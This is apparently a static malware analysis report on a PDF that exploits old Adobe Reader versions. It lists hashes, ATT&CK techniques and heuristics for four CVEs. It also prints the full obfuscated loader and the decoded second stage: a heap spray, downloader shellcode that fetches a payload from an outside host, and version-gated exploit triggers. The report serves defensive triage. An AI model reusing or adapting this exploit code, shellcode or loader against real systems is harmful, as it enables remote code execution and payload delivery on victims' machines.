Malicious PDF — malware analysis report

Static analysis result for SHA-256 635c52683a03f72c…

MALICIOUS

PDF

5.0 KB Created: 2010-08-11 11:21:23 Authoring application: Sffapitab (via ec917Xocepibejomje) First seen: 2026-05-11. Note: the Info dictionary is part of the payload, not incidental metadata — the recovered second stage reads Author and Title as the ciphertext of the download URL, the custom Info key 'yP' as its substitution table, and a Producer beginning with 'debug' as a switch for app.alert() tracing; the pseudo-random authoring strings are consistent with generated metadata.
MD5: d69cf9c8d373cf456a9d2bc88f6d432e SHA-1: 0416cc1ac4742f673c193d7dc1ef6419bc2fe266 SHA-256: 635c52683a03f72cfc8c46bb976c7edf527a1b6191c187a7b16add2780103dcd
410 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment (delivery vector inferred from the file type, not observed in this static analysis) T1027 Obfuscated Files or Information (filler-character stripping and an XOR-encoded second stage hidden in page text, see extracted artifacts) T1105 Ingress Tool Transfer (downloader shellcode fetching the embedded URL)

The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, CVE-2008-2992) to execute arbitrary code. The first stage (/JS object 10) strips filler characters from a string, rebuilds a second stage from the words of the current page (hex pairs XOR 0x38) and eval()s it; the recovered stage selects an exploit branch by app.viewerVersion and sprays the heap with NOP-sled-plus-shellcode blocks before each trigger. The shellcode embedded in the deobfuscated JavaScript attempts to download a payload from the URL http://ahrudi.egh/4. That URL is not a literal in the script: it is recovered by mapping the document's Author and Title metadata through a substitution table stored in the custom Info key 'yP', and the shellcode appends the viewer version as a query string (http://ahrudi.egh/4?reader_version=<app.viewerVersion>), so network indicators should match on the host and path prefix rather than the exact string. ".egh" does not appear to be a delegated TLD, so confirm the decode against the raw Info dictionary before acting on the host. This indicates a malicious document designed to exploit vulnerabilities for initial execution and payload delivery; all four CVEs were patched by Adobe by early 2010, so the chain is only effective against unpatched Reader 7.x–9.2.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation) In this sample the branch is reached only when app.viewerVersion == 9.2; it sprays toward 0x30303030 (dY(1)), calls util.printd with a crafted format string before and after media.newPlayer(null), and swallows the resulting exception — consistent with the public December 2009 exploit pattern.
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation) Here it is gated on app.viewerVersion < 9.1 and on app.doc.Collab.getIcon being present; the argument is "N." followed by at least 0x4000 tab characters, after a spray toward 0x0c0c0c0c (dY(0)).
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation) Here it fires when app.viewerVersion < 8, with an empty subj and a msg of at least 44,952 characters of 0x0c0c — matching the 0x0c0c0c0c spray target set up by dY(0).
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation) Here it fires when app.viewerVersion > 8 (i.e. 8.1.x and all 9.x), after a spray toward 0x30303030 (dY(1)), with the format "%45000f" and a 296-digit numeric string ("12999999999999999999" followed by 276 '8' characters).
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file. Note that the gates in this sample (> 8, < 8, < 9.1, == 9.2) overlap rather than being mutually exclusive — a Reader 9.0 viewer runs both the util.printf and Collab.getIcon branches — and the comparisons coerce the string returned by app.viewerVersion.toString() to a number.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths. Each branch is preceded by the spray routine dY(), which fills a global array with 0x400000-byte blocks of 0x9090 NOP sled plus shellcode, sized to reach 0x0c0c0c0c or 0x30303030 depending on the branch.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudi.egh/4 Referenced by PDF JavaScript (decoded from Info metadata, not a literal in the script; the shellcode requests it with "?reader_version=<app.viewerVersion>" appended, so match on host and path prefix rather than the exact string. ".egh" does not appear to be a delegated TLD — confirm the decode against the raw Info dictionary before using the host as an indicator.)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0xDED 1572 bytes
SHA-256: 3c45e59a17c591683f4cce1ce1b779ddd09d7a2193a920c9b9065cd8aa3aad38
Detection
ClamAV: No threats found (a signature miss on a carved, obfuscated script stage is expected and not exculpatory; the verdict rests on the API and structural findings above)
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). The count reflects a literal scan of the carved text: the stage also contains an eval( call, but it is split by filler characters ("eva#AlAA(") and is only visible after the replace(/[A#]/g, '') step, so keyword counts on this artifact understate its decoder usage.
Preview script
First 1,000 lines of the extracted script (the carved stage is a single line)
// Analyst annotation — first-stage loader carved from /JS object 10. The code line below is reproduced byte-for-byte;
// only these comment lines were added. What the visible code does:
//  * The `this.JSON` guard and the `walk`/`str` fragments (reviver/toJSON handling) resemble pieces of the public
//    json2.js polyfill and are never invoked here — they read as camouflage (reviewer reading; not confirmed).
//  * `j` is a junk-padded string; `.replace(/[A#]/g, '')` strips the filler characters 'A' and '#'. Stripped, it
//    assigns kB=56 (0x38), rS=this, oBG='getPageNthWord', aV='getPageNumWords', rU='fromCharCode', then collects
//    every word of the current page with getPageNthWord(), treats the text as hex pairs, XORs each byte with 0x38,
//    and eval()s the result — the second stage is hidden in page text, not in this stream.
//  * `tW = new Function(j)` compiles that loader; `cBQ(eLG)` references two names defined nowhere in this artifact,
//    so it throws, and the catch handler `tW()` is what actually runs the loader. The literal eval( is split by
//    filler ("eva#AlAA(") and would evade a plain keyword scan of the carved text.
var j='';var tW='';if (!this.JSON) {try {                function walk(holder, key) {                    var k, v, value = holder[key];                    if (value && typeof value === 'object') {                        for (k in value) {                            if (Object.hasOwnProperty.call(value, k)) {                                v = walk(value, k);                                if (v !== undefined) {                                    value[k] = v;                                } else {                                    delete value[k];                                }                            }                        }                    }                    return reviver.call(holder, key, value);                }j='var kB = 56 ;var# rS =# this;var oBG=\'ge\'+\'tP##agAeNt\'+\'hWo#rd\';AAvar #aV=\'ge\'+\'tPaA#g\'A+\'eN##umW\'+\'ordA#s\';va##r r#AU=\'fr\'+A#\'omCAh\'+#\'arCode\';var iD=rS[#aV](this.ApageNum);var #t=#A\'\';for(vAar AnQH=0;nQH< i#ADA#;AA nQAAH++){t=[t##,rS[oA#BG](rS.pag#eNum,#nQH,A#t#Arue)].joi##n(\'\');#;}va##r nSJ=#\'\';Af#o#r(v#ar #nQH=0;n#QH #< t.leng#Ath; nQHA#+=2)A{xG=t.##substr(##nQH,A2);nSJ=[nSJ,String##[rU]#(parseInt(xG,A16)^kB##)].join(\'\');}A#eva#AlAA(nSJ);nSJ=nuAll;'.replace(/[A#]/g, '');        function str(key, holder) {            var i,k,v,length,mind = gap,partial,value = holder[key];            if (value && typeof value === 'object' &&                    typeof value.toJSON === 'function') {                value = value.toJSON(key);            }    }tW = new Function(j);cBQ(eLG);} catch(aX){tW();}}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3767 bytes (analyzer-produced: the first stage's page-words → hex → XOR 0x38 transform applied and whitespace normalized, so the hash below identifies the analyzer output, not bytes present in the PDF — do not use it as a file indicator)
SHA-256: 7c7a4655e9e5fda698c0562be66678e9136d2f4921b26dab7e33d3443af66f1a
Detection
ClamAV: No threats found (a signature miss on an analyzer-normalized, decoded stage is expected and not exculpatory; the verdict rests on the API and structural findings above)
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script (the stage is a single line; the preview ends in non-printable bytes after vI=["iB","nE","cL"]; — likely padding left over from the XOR decode rather than executable code)
// Analyst annotation — second stage recovered from the page-text/XOR loader. The code below is byte-identical to the
// carved artifact (including the trailing non-printable residue); only these comment lines were added.
//  * Configuration lives in the PDF Info dictionary: `this.info['yP']` is a substitution table, and hS()/oB() map each
//    character of Author+Title through it against the alphabet `pQZ` to rebuild the download URL — the URL is never a
//    literal in the script. A Producer starting with 'debug' turns on app.alert() tracing (`yZ`).
//  * eD() assembles the shellcode from %u words and appends the URL plus "?reader_version=<app.viewerVersion>"
//    (byte-swapped into %u form by aJ()), so the real request URL carries a query string. The leading words
//    (33 C0 / 64 8B 40 30 / 8B 40 0C / 8B 70 1C ...) look like a PEB/Ldr walk to locate kernel32, and later words
//    spell "urlmon" and ".exe" — consistent with a URLDownloadToFile-style downloader; confirm by disassembly.
//  * dY(qF) is the heap spray: 0x400000-byte blocks of 0x9090 NOP sled plus shellcode kept alive in the global `zKZ`,
//    with a block count chosen so the allocations are intended to reach 0x0c0c0c0c (qF=0) or 0x30303030 (qF=1).
//  * Dispatcher on iX = app.viewerVersion.toString(): > 8 -> util.printf("%45000f", 296-digit string) [CVE-2008-2992];
//    < 8 -> Collab.collectEmailInfo with a 0x0c0c-filled msg [CVE-2007-5659]; < 9.1 -> Collab.getIcon("N." + >=0x4000
//    tabs) [CVE-2009-0927]; == 9.2 -> util.printd + media.newPlayer(null) [CVE-2009-4324]. iX is a string, so these are
//    coerced numeric compares, and the gates overlap (a 9.0 viewer runs both the printf and getIcon branches).
var h=26326;var v='';try {var lM='d'} catch(lM){};var pQZ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';this.zC=false;var pE="pE";var pQ=false;var vS=this.info['yP'].replace(/[\s]/g, '');dW={};var zS=["eZ","fM","wZ"];var mTE = this.info;var yZ = (mTE.producer.substr(0,5) == 'debug');var zKZ = new Array(); var lG = "%u";function qH(str){str = str.split(lG);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function nW(str1, str2){return [str1, str2].join("");}function eD(rG){var eL = hS();var iX = nQ();eL += ((eL.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + iX;if(yZ) app.alert("URL: " + eL);eL=aJ(eL);var d=lG;var xG=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";xG+=eL;return qH(xG);};function hS(){var iJ = (mTE.author + mTE.title).replace(/[\s]/g, '');var nS = oB(iJ, vS, pQZ);return nS;};function oB(iJ, pQZ, vS){var nS="";for(var i=0; i < iJ.length; i++){var lK = pQZ.indexOf(iJ[i]);if(lK > -1 ){nS += vS[lK];}}return nS;};function 
aJ(iJ){var out = "";iJ = eLI(iJ);g = Math.round(iJ.length / 4);if (g != iJ.length /4) iJ+="00";for(var i=0; i < iJ.length; i+=4){out+= lG + iJ.substr(i+2, 2) + iJ.substr(i, 2);}return out;};function eLI(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function gFI(mV, len){while (mV.length * 2 < len){mV = nW(mV, mV);}return mV.substring(0, len / 2);};function dY(qF){var pK = 0x0c0c0c0c;        sV = eD("pdf");if (qF == 1){pK = 0x30303030;}var fI = 0x400000;var ln = sV.length * 2;var wB = fI - (ln + 0x38);var mV = qH(lG+"9090"+lG+"9090"); mV = gFI(mV, wB);var nIR = (pK - 0x400000) / fI;for (var b = 0; b < nIR; b ++ ){zKZ[b] = nW(mV, sV);}};function nQ(){try {return app.viewerVersion.toString();}catch(bC){    return 0;}}if(yZ) app.alert("called exploit");var iX = nQ();if(yZ)  app.alert("v: " + iX);if (iX > 8){if(yZ) app.alert("util.printf");dY(1);var gL = "12999999999999999999";for (fMN=0; fMN < 276; fMN++) gL += "8";util.printf("%45000f", gL);}if (iX < 8){if(yZ) app.alert("Collab.collectEmailInfo");dY(0);var xW = qH(lG+"0c0c"+lG+"0c0c");while (xW.length < 44952) xW += xW;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : xW});}if (iX < 9.1){if (app.doc.Collab.getIcon){if(yZ) app.alert("Collab.getIcon");dY(0);var gLE = unescape("%09");while (gLE.length < 0x4000) gLE += gLE;gLE = "N." + gLE;app.doc.Collab.getIcon(gLE);}}if (iX == 9.2){if(yZ) app.alert("media.newPlayer");dY(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var pC={nI:"uX".charCodeAt(24487)};try {} catch(zK){};vI=["iB","nE","cL"];�*�� �*�� �*�� �*�� �*�� FF